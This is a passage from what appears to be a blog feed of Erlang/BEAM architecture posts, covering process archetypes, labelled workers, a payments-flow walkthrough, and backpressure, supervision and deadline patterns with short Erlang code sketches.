&lt;p&gt;It’s tempting to say: “Ah, Java threads have become Erlang processes.”&lt;/p&gt;
&lt;p&gt;They haven’t. They’ve just stopped being quite as heavy.&lt;/p&gt;
&lt;p&gt;A few reminders:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Virtual threads still share mutable state unless you fight very hard not
to.&lt;/li&gt;
&lt;li&gt;Failure propagation and restart strategies are still something you build
yourself. (In Erlang the supervisor is a library too, but the
&lt;em&gt;primitives&lt;/em&gt; it relies on, namely links, monitors, and exit signals,
are baked into the VM.)&lt;/li&gt;
&lt;li&gt;There is no mailbox. If you want asynchronous message passing, you
assemble it from queues and hope for the best.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;So yes, you can implement the Worker archetype in Java now without hurting
yourself. But you must &lt;strong&gt;decide&lt;/strong&gt; to structure it that way.&lt;/p&gt;
&lt;p&gt;On the BEAM, you must work equally hard to avoid doing it that way.&lt;/p&gt;
&lt;hr /&gt;
&lt;h1 id=&quot;about-naming-workers&quot; tabindex=&quot;-1&quot;&gt;About naming Workers&lt;/h1&gt;
&lt;p&gt;OTP 27 added something useful: &lt;strong&gt;process labels&lt;/strong&gt; via
&lt;code&gt;proc_lib:set_label/1&lt;/code&gt;. This lets you attach a descriptive term to any
process that does &lt;em&gt;not&lt;/em&gt; have a registered name. Tools like &lt;code&gt;c:i/0&lt;/code&gt;,
&lt;code&gt;observer&lt;/code&gt;, and crash reports can show this label.&lt;/p&gt;
&lt;p&gt;So you can think of it this way:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Registered name&lt;/strong&gt;: a real name used for lookup and messaging
(&lt;code&gt;register(Name, Pid)&lt;/code&gt;).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Label&lt;/strong&gt;: a descriptive tag for humans and tools; not used for routing
or lookup.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For Workers, this means:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;You still normally don’t give them global names.&lt;/li&gt;
&lt;li&gt;When you do want visibility in tools, add a &lt;strong&gt;label&lt;/strong&gt;, not a global name.&lt;/li&gt;
&lt;li&gt;Pooled Workers are typically anonymous processes with labels and are discovered through the pool, not directly.&lt;/li&gt;
&lt;/ul&gt;
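&lt;p&gt;A minimal sketch of a labelled Worker (requires OTP 27 or later; the
label term is free-form and the wrapper name is my own):&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;spawn_labelled_worker(JobName, Fun, Input) -&amp;gt;
    spawn(fun() -&amp;gt;
        %% Visible in c:i/0, observer, and crash reports, but not
        %% usable for lookup or message routing.
        proc_lib:set_label({worker, JobName}),
        Fun(Input)
    end).
&lt;/code&gt;&lt;/pre&gt;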
&lt;hr /&gt;
&lt;h1 id=&quot;takeaways&quot; tabindex=&quot;-1&quot;&gt;Takeaways&lt;/h1&gt;
&lt;p&gt;A Worker is the simplest and most honest process archetype:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Short-lived Workers: one job, then exit.&lt;/li&gt;
&lt;li&gt;Pooled Workers: one job at a time, reuse scarce resources.&lt;/li&gt;
&lt;li&gt;No routing. No supervision. No global state.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The BEAM makes this style of concurrency both natural and cheap. External
systems do not.&lt;/p&gt;
&lt;p&gt;In following posts, we will look at the other villagers: &lt;strong&gt;Resource owners,
Routers, Gatekeepers, and Observers&lt;/strong&gt;. Together they give you enough
vocabulary to design systems with many processes that still behave like
adults.&lt;/p&gt;
&lt;p&gt;One archetype per role. One role per process. Sleep improves dramatically
after that.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Process Archetypes: The Roles in the Gnome Village</title>
    <link href="https://happihacking.com/blog/posts/2025/process_archetypes/"/>
    <updated>2025-11-21T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2025/process_archetypes/</id>
    <summary>Every process has a job. Problems start when it has two.</summary>
    <content type="html">&lt;h1 id=&quot;process-archetypes-the-roles-in-the-gnome-village&quot; tabindex=&quot;-1&quot;&gt;Process Archetypes: The Roles in the Gnome Village&lt;/h1&gt;
&lt;p&gt;The BEAM makes it easy to create thousands of processes. This is powerful,
but only if you give each process a clear role. A process without a role
becomes a small, confused god-object with a mailbox. Eventually it grows a
personality disorder.&lt;/p&gt;
&lt;p&gt;To avoid this fate, I use a simple model of &lt;strong&gt;five archetypes&lt;/strong&gt;. Every
process in a BEAM system fits one of them. If it doesn’t, it is probably
doing too much.&lt;/p&gt;
&lt;p&gt;The archetypes are not design patterns. They are behavioural roles. Think
of them as job descriptions for the gnomes in &lt;a href=&quot;https://happihacking.com/blog/posts/2025/the-gnome-village/&quot;&gt;the village&lt;/a&gt;. (I first outlined these categories in &lt;a href=&quot;https://happihacking.com/blog/posts/2024/designing_concurrency/&quot;&gt;Designing Concurrent Systems on the BEAM&lt;/a&gt;; this series goes deeper.)&lt;/p&gt;
&lt;p&gt;The roles are simple:
&lt;strong&gt;Workers do work. Resource owners keep state. Routers decide. Gatekeepers protect. Observers watch.&lt;/strong&gt;
That is the entire system. You can stop reading now.&lt;/p&gt;
&lt;hr /&gt;
&lt;h1 id=&quot;workers&quot; tabindex=&quot;-1&quot;&gt;Workers&lt;/h1&gt;
&lt;p&gt;A Worker handles exactly one task. It does the job, reports back, and
disappears. The disappearing part is important. It keeps the world tidy.&lt;/p&gt;
&lt;p&gt;Workers are the default choice when you need parallelism or simple
isolation. Spawn one, give it a message, and let it finish. If it crashes,
only one piece of work is lost. That is usually acceptable. If it isn’t,
the Worker should not be doing that job.&lt;/p&gt;
&lt;p&gt;Some Workers live in pools. These Workers might keep some configuration
between jobs. They still perform one job at a time, but they do not vanish
afterwards. They sit quietly until needed again. This is the polite version
of a thread-pool, without the traditional thread-pool problems.&lt;/p&gt;
&lt;p&gt;Workers embody the BEAM’s idea of cheap concurrency. You hire many, pay
them little, and expect them to fail occasionally.&lt;/p&gt;
&lt;hr /&gt;
&lt;h1 id=&quot;resource-owners&quot; tabindex=&quot;-1&quot;&gt;Resource Owners&lt;/h1&gt;
&lt;p&gt;A Resource Owner does one thing: it owns state. A cart, a user session, a
WebSocket, a payment intent. Anything that needs a clear owner becomes a
process.&lt;/p&gt;
&lt;p&gt;A Resource Owner serializes access by receiving one message at a time.
There are no locks, no strategies, and no passive-aggressive comments in
code reviews about “thread safety”. A Resource Owner is always thread-safe,
because it &lt;em&gt;is&lt;/em&gt; the thread.&lt;/p&gt;
&lt;p&gt;Aggregators are a subtype. They collect rolling data or maintain sliding
windows. Same principle, but more numbers.&lt;/p&gt;
&lt;p&gt;If the system relies on invariants, the Resource Owner is where those
invariants live. You do not put them in five layers of frameworks. You put
them in a process that owns the data. It is the simplest possible model,
which is why it works.&lt;/p&gt;
&lt;hr /&gt;
&lt;h1 id=&quot;routers&quot; tabindex=&quot;-1&quot;&gt;Routers&lt;/h1&gt;
&lt;p&gt;A Router never owns anything. It reads a message and forwards it to the
correct place. That is all.&lt;/p&gt;
&lt;p&gt;Sometimes the Router fans messages out (broadcaster). Sometimes it sends
them to a single target (director). In both cases it has no state and no
emotional attachments. A Router that remembers things, other than where to
send messages, has abandoned its post.&lt;/p&gt;
&lt;p&gt;Routers keep the architecture clean. If a Router becomes complicated, the
system design is wrong. If a Router starts holding state, the system design
is very wrong. This is usually how accidental bottlenecks begin.&lt;/p&gt;
&lt;hr /&gt;
&lt;h1 id=&quot;gatekeepers&quot; tabindex=&quot;-1&quot;&gt;Gatekeepers&lt;/h1&gt;
&lt;p&gt;A Gatekeeper protects something. It limits, delays, sequences, or blocks.
It exists because the outside world cannot be trusted.&lt;/p&gt;
&lt;p&gt;There are three common types:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Flow controllers&lt;/strong&gt; enforce ordering or stage boundaries.
&lt;strong&gt;Rate limiters&lt;/strong&gt; slow the producers down so you don’t melt your downstream systems.
&lt;strong&gt;Circuit breakers&lt;/strong&gt; give up early when something is clearly on fire.&lt;/p&gt;
&lt;p&gt;The Gatekeeper role is simple: let good messages through, keep bad messages
out, and contain the blast radius. Without Gatekeepers, a small outage
becomes a distributed festival of sadness.&lt;/p&gt;
&lt;hr /&gt;
&lt;h1 id=&quot;observers&quot; tabindex=&quot;-1&quot;&gt;Observers&lt;/h1&gt;
&lt;p&gt;Observers do not own state and do not do work. They watch other processes
and respond to conditions.&lt;/p&gt;
&lt;p&gt;Sentinels watch for overload, timeouts, and stalled flows. Supervisors
watch for death, restart children, and otherwise mind their own business.&lt;/p&gt;
&lt;p&gt;Supervisors are the managers of the village. They never bake bread or carry
logs. They only decide who should be restarted and when. A Supervisor that
does real work is a future incident waiting to happen.&lt;/p&gt;
&lt;p&gt;Observers tie the system together without touching the logic.&lt;/p&gt;
&lt;hr /&gt;
&lt;h1 id=&quot;why-roles-matter&quot; tabindex=&quot;-1&quot;&gt;Why Roles Matter&lt;/h1&gt;
&lt;p&gt;Most problems in process-oriented systems come from &lt;strong&gt;role confusion&lt;/strong&gt;. A
Resource Owner that tries to route requests becomes a bottleneck. A Router
that stores state becomes a single point of failure. A Worker that lives
too long becomes a Resource Owner by accident. A Supervisor that does real
work becomes your next 3 AM story.&lt;/p&gt;
&lt;p&gt;Clear roles reduce cognitive load. They make supervision trees predictable.
They make debugging obvious. When each process has one job, everything is
easier to trace, reason about, and restart.&lt;/p&gt;
&lt;p&gt;Good systems are built from small pieces with strong opinions about what
they do.&lt;/p&gt;
&lt;hr /&gt;
&lt;h1 id=&quot;looking-ahead&quot; tabindex=&quot;-1&quot;&gt;Looking Ahead&lt;/h1&gt;
&lt;p&gt;This post introduced the five archetypes. Next, I will walk through each
role in detail, with examples and the small mistakes that make big
problems.&lt;/p&gt;
&lt;p&gt;To make this practical, I’ll also publish a set of minimal examples in
Erlang, Elixir, and a few other languages. The BEAM versions will be small.
The non-BEAM versions will demonstrate why the BEAM versions are small.&lt;/p&gt;
&lt;p&gt;One archetype per post. One job per process. Life is easier that way.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Gnomes, Domains, and Flows: Putting It Together</title>
    <link href="https://happihacking.com/blog/posts/2025/gnomes-domains-flows-putting-it-together/"/>
    <updated>2025-11-12T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2025/gnomes-domains-flows-putting-it-together/</id>
    <summary>From checklist to a running payments path</summary>
    <content type="html">&lt;p&gt;&lt;strong&gt;Glossary:&lt;/strong&gt; Resource owner = the process that owns mutable state for a domain object. Request owner = the process coordinating one user request end-to-end within a domain. Adapter = the boundary process that talks to an external system. Orchestration = the domain that coordinates multi-step work across other domains.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://happihacking.com/images/water_and_sky.jpg&quot; alt=&quot;Calm system landscape&quot; title=&quot;Calm system landscape&quot; /&gt;&lt;/p&gt;
&lt;h1 id=&quot;recap-the-ingredients&quot; tabindex=&quot;-1&quot;&gt;Recap the ingredients&lt;/h1&gt;
&lt;p&gt;Domains keep code and data in their lanes. Flows choreograph how work crosses those lanes. Processes stay light: they read scrolls from the right domain, follow the flow contracts, and let supervisors restart them when needed. The easiest way to validate the frame is to walk through one production path and make sure every element has a deliberate owner.&lt;/p&gt;
&lt;img src=&quot;https://happihacking.com/images/ditaa/518144cac42fcf069c4ecac5eca7754a.svg&quot; alt=&quot;Diagram&quot; class=&quot;ditaa-diagram&quot; /&gt;
&lt;p&gt;The picture is simple: every box is its own OTP application with a supervision tree. The API validates, orchestration coordinates, the ledger owns truth, and adapters isolate external chaos.&lt;/p&gt;
&lt;p&gt;PSP = payment service provider (card processor). The adapter isolates that boundary so the rest of the system never sees its quirks.&lt;/p&gt;
&lt;h1 id=&quot;payments-path-walkthrough&quot; tabindex=&quot;-1&quot;&gt;Payments path walkthrough&lt;/h1&gt;
&lt;p&gt;Consider a simple “authorize card, log ledger entry, notify customer” workflow.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Call flow&lt;/strong&gt;: The API domain receives an HTTPS call. It runs synchronous validation, enforces a 200 ms budget, and passes a traced request into the orchestration domain.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Message flow&lt;/strong&gt;: The orchestrator sends commands to the payments domain (“authorize”), the ledger domain (“append entry”), and the notifications domain (“send receipt”). Each message carries a &lt;code&gt;trace_id&lt;/code&gt;, versioned payload, and retries with idempotency keys.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Data flow&lt;/strong&gt;: The payments domain owns card tokens and risk data; it emits an authorization fact when done. The ledger domain owns balances and journal entries; it exposes append-only writes. Notifications subscribe to the authorization fact and the ledger entry, derive their own view, and never peek into foreign ETS tables.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Process flow&lt;/strong&gt;: Each domain runs inside its own supervision tree. The payments domain spawns a per-authorization worker supervised &lt;code&gt;one_for_one&lt;/code&gt;. The ledger domain keeps long-lived resource owners guarded by a &lt;code&gt;rest_for_one&lt;/code&gt; tree. Notifications use a pool of short-lived workers. If the PSP adapter dies, only its tree restarts; the ledger keeps writing.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Every arrow on the whiteboard now has a name. When something breaks, you know whether it is a data-contract issue, a message protocol bug, a process-topology failure, or a call-budget miss. Compliance questions (“who touched the ledger?”) get answered by pointing to the domain module and its audit log. Operational questions (“why did latency spike?”) use the same flow instrumentation you designed earlier. The orchestrator’s outbox ties database writes and message dispatch together, while the ledger enforces idempotency on the tuple &lt;code&gt;{account_id, idem_key}&lt;/code&gt; so replays never duplicate money.&lt;/p&gt;
&lt;h1 id=&quot;logging-and-tracing-at-the-boundaries&quot; tabindex=&quot;-1&quot;&gt;Logging and tracing at the boundaries&lt;/h1&gt;
&lt;p&gt;Every domain boundary is also a logging boundary. When the API domain hands control to the payments domain, log the intent, the trace identifier, and the schema version that crossed the line. When the payments domain emits an authorization event, append the fact to its domain log with the same &lt;code&gt;trace_id&lt;/code&gt;. The ledger domain writes its own append-only audit trail when balances change. That gives regulators exactly what they ask for: who touched the data, when, and through which contract.&lt;/p&gt;
&lt;p&gt;For cross-domain flows, propagate &lt;code&gt;trace_id&lt;/code&gt; and &lt;code&gt;span_id&lt;/code&gt; through OpenTelemetry (or the tracing stack you already run). Each message send, process spawn, and reply records the context so you can reconstruct the path end to end. Mailbox metrics tell you if a process is drowning; traces tell you which hop stalled. When every domain owns its logging and every flow forwards its trace context, observability stops being a bolt-on and becomes part of the boundary contract.&lt;/p&gt;
&lt;p&gt;Use spans &lt;code&gt;api.receive → orchestrate.authorize → psp.call → ledger.append → notify.send&lt;/code&gt;. Log &lt;code&gt;schema_version&lt;/code&gt; and &lt;code&gt;idem_key&lt;/code&gt; at each hop. If a message replays, the trace shows it, and idempotency plus the shared &lt;code&gt;#msg_meta{}&lt;/code&gt; header keep state clean.&lt;/p&gt;
&lt;h1 id=&quot;checklist-before-you-ship&quot; tabindex=&quot;-1&quot;&gt;Checklist before you ship&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Domain map&lt;/strong&gt;: Draw boxes for each domain, list the data they own, and the modules/OTP apps that implement them.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Flow contracts&lt;/strong&gt;: For every boundary, document the data schema, message protocol, supervising tree, and call budget.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Observability hooks&lt;/strong&gt;: Ensure trace IDs, mailbox metrics, schema registries, and breaker dashboards are wired to the flow they observe.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Failure drills&lt;/strong&gt;: Kill a payments worker, a ledger supervisor, and a notification queue. Each failure should stay inside its domain boundary while the flow recovers.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Outbox pause test&lt;/strong&gt;: Stop the orchestrator’s outbox process and prove that no dual-write happens; once it restarts, pending messages drain exactly once.&lt;/li&gt;
&lt;/ul&gt;
&lt;h1 id=&quot;whats-next&quot; tabindex=&quot;-1&quot;&gt;What’s next&lt;/h1&gt;
&lt;p&gt;If you skipped ahead, start with
&lt;a href=&quot;https://happihacking.com/blog/posts/2025/gnomes-domains-flows/&quot;&gt;Gnomes, Domains, and Flows&lt;/a&gt;, then
read
&lt;a href=&quot;https://happihacking.com/blog/posts/2025/domains-own-code-and-data/&quot;&gt;Domains Own Code and Data&lt;/a&gt;
and
&lt;a href=&quot;https://happihacking.com/blog/posts/2025/flows-keep-work-moving/&quot;&gt;Flows Keep Work Moving&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Next up we will focus on the process archetypes (workers, resource owners,
routers, gatekeepers, and observers) and show how they sit inside these flows.&lt;/p&gt;
&lt;p&gt;Prev: &lt;a href=&quot;https://happihacking.com/blog/posts/2025/flows-keep-work-moving/&quot;&gt;Flows Keep Work Moving&lt;/a&gt; | Next: &lt;a href=&quot;https://happihacking.com/blog/posts/2025/process_archetypes/&quot;&gt;Process Archetypes&lt;/a&gt;&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Flows Keep Work Moving</title>
    <link href="https://happihacking.com/blog/posts/2025/flows-keep-work-moving/"/>
    <updated>2025-11-12T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2025/flows-keep-work-moving/</id>
    <summary>Design data, message, process, and call paths on purpose</summary>
    <content type="html">&lt;p&gt;&lt;strong&gt;Glossary:&lt;/strong&gt; Resource owner = the process that owns mutable state for a domain object. Request owner = the process coordinating one user request end-to-end within a domain. Adapter = the boundary process that talks to an external system. Orchestration = the domain that coordinates multi-step work across other domains. PSP = payment service provider (card processor); the PSP adapter isolates that boundary.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://happihacking.com/images/gnomes_vs_machines.jpg&quot; alt=&quot;Gnome village vs machine park flow&quot; title=&quot;Gnome village vs machine park flow - Illustration by Elisabeth Bahngoura&quot; /&gt;&lt;/p&gt;
&lt;h1 id=&quot;flow-primer-four-ways-things-move&quot; tabindex=&quot;-1&quot;&gt;Flow primer: four ways things move&lt;/h1&gt;
&lt;p&gt;When you think in processes, a system splits into domains that own
resources and flows that move work. A flow tells you how facts, intents,
and control cross a domain boundary. Four flows cover day-to-day design:
data flow, message flow, process flow, and call flow.&lt;/p&gt;
&lt;img src=&quot;https://happihacking.com/images/ditaa/0638eeef9846c3befed7bfb7a6113761.svg&quot; alt=&quot;Diagram&quot; class=&quot;ditaa-diagram&quot; /&gt;
&lt;p&gt;The same topology looks different depending on which flow you inspect. Call flow covers the synchronous reply path, message flow covers the async fan-out, data flow tracks typed payloads, and process flow explains who runs each step.&lt;/p&gt;
&lt;h2 id=&quot;data-flow&quot; tabindex=&quot;-1&quot;&gt;Data flow&lt;/h2&gt;
&lt;p&gt;Data flow answers “what moves.”&lt;/p&gt;
&lt;p&gt;It describes the schema and lineage of facts as they travel through the
system. Define which domain publishes which fact, how versions evolve,
where you materialize views, and how you replay history if something
breaks. At the boundary, the producing domain publishes only the data it
owns; the consuming domain derives its own model instead of poking at
another domain’s private state.&lt;/p&gt;
&lt;h2 id=&quot;message-flow&quot; tabindex=&quot;-1&quot;&gt;Message flow&lt;/h2&gt;
&lt;p&gt;Message flow answers “who talks to whom and with what guarantees.”&lt;/p&gt;
&lt;p&gt;It defines the protocols between resource-owning gnomes. Decide whether a
payload is a command or an event, whether ordering matters, how to
correlate, how to retry, and what to do with dead letters.&lt;/p&gt;
&lt;p&gt;Message flow is the civility layer: domains ask each other for help through
documented messages and accept the delivery guarantees the protocol
provides.&lt;/p&gt;
&lt;h3 id=&quot;backpressure-contract&quot; tabindex=&quot;-1&quot;&gt;Backpressure contract&lt;/h3&gt;
&lt;p&gt;Backpressure is a &lt;strong&gt;protocol&lt;/strong&gt;, not an implementation detail. The contract
lives in &lt;strong&gt;message flow&lt;/strong&gt; and defines how senders must slow down.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Outcomes for &lt;code&gt;enqueue&lt;/code&gt; across a boundary:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;ok&lt;/code&gt; — accepted now.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;{busy, RetryMs}&lt;/code&gt; — not accepted; sender should back off for ~&lt;code&gt;RetryMs&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;{queued, Pos}&lt;/code&gt; — accepted into a queue; sender may pace based on &lt;code&gt;Pos&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Async variant:&lt;/strong&gt; &lt;code&gt;cast&lt;/code&gt; carries &lt;code&gt;{ReplyTo, Ref}&lt;/code&gt;; the server replies with &lt;code&gt;{ack, Ref}&lt;/code&gt; or &lt;code&gt;{busy, Ref, RetryMs}&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Idempotency:&lt;/strong&gt; all retries carry the same &lt;code&gt;idem_key&lt;/code&gt;. Receivers must dedup.&lt;/p&gt;
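&lt;p&gt;A receiver-side dedup sketch, keeping seen keys in process state (a production version would bound or expire the set; the &lt;code&gt;seen&lt;/code&gt; field is an assumption):&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;%% Replays with a known idem_key get the same ok without enqueueing twice.
handle_call({enqueue, Msg, Idem}, _From, S = #state{seen = Seen, q = Q}) -&amp;gt;
    case sets:is_element(Idem, Seen) of
        true  -&amp;gt; {reply, ok, S};   % duplicate: already accepted
        false -&amp;gt; {reply, ok, S#state{seen = sets:add_element(Idem, Seen),
                                       q    = queue:in({Idem, Msg}, Q)}}
    end.
&lt;/code&gt;&lt;/pre&gt;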
&lt;p&gt;&lt;strong&gt;Sender behavior:&lt;/strong&gt; on &lt;code&gt;{busy, RetryMs}&lt;/code&gt;, jittered sleep; on timeouts,
switch to exponential backoff; abandon after a budget.&lt;/p&gt;
&lt;p&gt;The callee decides &lt;code&gt;ok&lt;/code&gt;, &lt;code&gt;busy&lt;/code&gt;, or &lt;code&gt;queued&lt;/code&gt; based on its process-flow limits (bounded queues, concurrency caps).&lt;/p&gt;
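&lt;p&gt;The sender side of that contract could be sketched like this (the attempt budget and jitter via &lt;code&gt;rand:uniform/1&lt;/code&gt; are assumptions; the &lt;code&gt;{queued, Pos}&lt;/code&gt; case is omitted for brevity):&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;%% Jittered sleep on busy; give up once the attempt budget is spent.
send_with_backoff(_Server, _Msg, _Idem, 0) -&amp;gt;
    {error, budget_exhausted};
send_with_backoff(Server, Msg, Idem, Attempts) -&amp;gt;
    case gen_server:call(Server, {enqueue, Msg, Idem}) of
        ok -&amp;gt;
            ok;
        {busy, RetryMs} -&amp;gt;
            timer:sleep(RetryMs + rand:uniform(RetryMs)),   % jitter
            send_with_backoff(Server, Msg, Idem, Attempts - 1)
    end.
&lt;/code&gt;&lt;/pre&gt;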
&lt;p&gt;&lt;strong&gt;Synchronous patterns (caller waits)&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;call&lt;/code&gt; with the &lt;code&gt;ok | {busy, RetryMs}&lt;/code&gt; contract for explicit backpressure.&lt;/li&gt;
&lt;li&gt;Bounded concurrency (semaphore) around the callee; caller blocks until a slot frees.&lt;/li&gt;
&lt;li&gt;Hedged calls with budget (fail fast if downstream is slow; no retries beyond budget).&lt;/li&gt;
&lt;li&gt;Token-bucket at the caller (rate-limit before sending).&lt;/li&gt;
&lt;li&gt;Inline validation+reject (cheap checks sync; expensive work deferred async).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Asynchronous patterns (caller doesn’t wait)&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Job ID + completion event (done|failed later to a notifier).&lt;/li&gt;
&lt;li&gt;Credit/pull-based demand (consumer grants credits; producer sends only with credit).&lt;/li&gt;
&lt;li&gt;Outbox submit + occasional status query (running|done|failed) outside the hot path.&lt;/li&gt;
&lt;li&gt;Monitor the worker (react to DOWN or completion messages; no send-time blocking).&lt;/li&gt;
&lt;li&gt;Pressure subscription (publish high|mid|low; senders pace heuristically).&lt;/li&gt;
&lt;li&gt;TTL/deadline in payload (receiver drops/defers if expired; sender uses compensations).&lt;/li&gt;
&lt;li&gt;Queue TTL + DLQ (expired work is rerouted; upstream metrics trigger
pacing).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Tiny sync call template (example shape only; the contract is defined above):&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;%% Sync protocol
handle_call({enqueue, Msg, Idem}, _From, S=#state{q=Q}) -&amp;gt;
  case queue:len(Q) &amp;gt;= ?MAX of
    true  -&amp;gt; {reply, {busy, 50}, S};
    false -&amp;gt; {reply, ok, S#state{q=queue:in({Idem,Msg}, Q)}}
  end.
&lt;/code&gt;&lt;/pre&gt;
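&lt;p&gt;The async &lt;code&gt;{ReplyTo, Ref}&lt;/code&gt; variant described above could take this shape (again an example shape only, not a fixed API):&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;%% Async protocol: acknowledge or push back with a message instead of a reply.
handle_cast({enqueue, Msg, Idem, {ReplyTo, Ref}}, S = #state{q = Q}) -&amp;gt;
    case queue:len(Q) &amp;gt;= ?MAX of
        true  -&amp;gt;
            ReplyTo ! {busy, Ref, 50},
            {noreply, S};
        false -&amp;gt;
            ReplyTo ! {ack, Ref},
            {noreply, S#state{q = queue:in({Idem, Msg}, Q)}}
    end.
&lt;/code&gt;&lt;/pre&gt;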
&lt;h2 id=&quot;process-flow&quot; tabindex=&quot;-1&quot;&gt;Process flow&lt;/h2&gt;
&lt;p&gt;Process flow answers “who does the work and how it survives failure.”&lt;/p&gt;
&lt;p&gt;It is the topology and lifecycle of the workers. Define where workers live,
who supervises them, how they restart, how you cap concurrency.&lt;/p&gt;
&lt;p&gt;Pick the supervisor strategy that matches dependency: one_for_one for
isolated workers, rest_for_one when downstream children depend on an
upstream owner, and one_for_all when the group must rise and fall together.
Use a dynamic supervisor (simple_one_for_one in Erlang, DynamicSupervisor
in Elixir) when children are created at runtime.&lt;/p&gt;
&lt;p&gt;Set each child’s restart type: permanent (always), transient (only on
crash), or temporary (never). Combine with a restart budget (max_restarts /
max_seconds) per subtree to cap blast radius. Add backoff with jitter on
restarts to avoid herd effects. Choose shutdown timeouts per role: short
for stateless workers, longer for stateful owners that must flush.&lt;/p&gt;
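&lt;p&gt;As a sketch, those choices map onto a supervisor &lt;code&gt;init/1&lt;/code&gt; like this (the child modules, limits, and timeouts are placeholders):&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;init([]) -&amp;gt;
    SupFlags = #{strategy  =&amp;gt; rest_for_one,  % workers depend on the owner
                 intensity =&amp;gt; 5,             % max_restarts ...
                 period    =&amp;gt; 10},           % ... per max_seconds
    Owner  = #{id =&amp;gt; ledger_owner,
               start =&amp;gt; {ledger_owner, start_link, []},
               restart =&amp;gt; permanent,
               shutdown =&amp;gt; 5000},            % stateful owner: time to flush
    Worker = #{id =&amp;gt; ledger_worker,
               start =&amp;gt; {ledger_worker, start_link, []},
               restart =&amp;gt; transient,         % restart only on crash
               shutdown =&amp;gt; 1000},            % stateless worker: short
    {ok, {SupFlags, [Owner, Worker]}}.
&lt;/code&gt;&lt;/pre&gt;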
&lt;p&gt;When we discuss process types in a future post we will also talk about
supervision tree structures.&lt;/p&gt;
&lt;h2 id=&quot;call-flow&quot; tabindex=&quot;-1&quot;&gt;Call flow&lt;/h2&gt;
&lt;p&gt;Call flow answers &amp;quot;how control and data move inside code.&amp;quot;&lt;/p&gt;
&lt;p&gt;Scope it to a single domain: from the entry point to the exit value,
including timing, cancellation, and error policy. At a domain boundary,
switch to message flow (that’s where backpressure and delivery semantics
live); don’t stretch a synchronous chain across domains.&lt;/p&gt;
&lt;p&gt;Design the path first, then the code:&lt;/p&gt;
&lt;p&gt;Keep the hot path short and explicit. Do validation and cheap lookups
inline; push slow or blocking work to workers. Set an end-to-end budget and
per-hop timeouts that fit inside it. Propagate context (trace_id, tenant,
deadline) through every call so lower layers can fail fast instead of
queuing doomed work. Make retries deliberate and only for idempotent steps;
prefer fallbacks or compensation over deep retry ladders. Avoid re-entrant
call cycles and synchronous “ping-pong” between processes—those become
invisible locks.&lt;/p&gt;
&lt;p&gt;Three common shapes cover most cases. Straight-through: a request owner
runs a small stack of pure transforms and one side-effect at the edge.
Short async detour: issue a local task and rejoin before the budget ends
(still inside the domain). Cross-domain work: cut the call, emit a message,
and return; any further coordination belongs to message flow.&lt;/p&gt;
&lt;p&gt;A quick checklist when you cut a path: define the return value and error
space; set an end-to-end deadline and per-hop timeouts; decide where
retries are allowed (and prove idempotency); push blocking work off the
scheduler; propagate trace_id and deadline; and terminate the call at the
boundary.&lt;/p&gt;
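&lt;p&gt;The deadline part of that checklist can be sketched as one helper: compute the remaining end-to-end budget, cap it per hop, and fail fast when it is gone (the function and argument names are illustrative):&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;%% DeadlineMs is an absolute monotonic timestamp carried in the context.
call_within(Server, Req, DeadlineMs, HopCapMs) -&amp;gt;
    Remaining = DeadlineMs - erlang:monotonic_time(millisecond),
    case Remaining =&amp;lt; 0 of
        true  -&amp;gt; {error, deadline_exceeded};   % don't queue doomed work
        false -&amp;gt; gen_server:call(Server, Req, min(Remaining, HopCapMs))
    end.
&lt;/code&gt;&lt;/pre&gt;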
&lt;h1 id=&quot;instrumenting-the-flows&quot; tabindex=&quot;-1&quot;&gt;Instrumenting the flows&lt;/h1&gt;
